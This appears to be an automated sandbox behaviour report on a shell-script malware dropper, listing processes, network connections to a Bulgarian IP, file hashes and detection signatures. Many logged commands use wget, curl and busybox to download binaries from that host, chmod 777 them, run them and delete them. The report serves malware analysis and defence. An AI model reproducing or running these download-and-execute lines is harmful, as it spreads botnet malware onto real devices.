[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

memory/868-1-0xb677a000-0xb678b044-memory.dmp

memory/869-2-0xb6792000-0xb67a3044-memory.dmp

memory/869-3-0xb6763000-0xb6774044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 02:53

Reported

2024-11-20 02:56

Platform

debian9-mipsbe-20240611-en

Max time kernel

88s

Max time network

90s

Command Line

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A

Processes

/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/chmod

[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/rm

[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/wget

[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

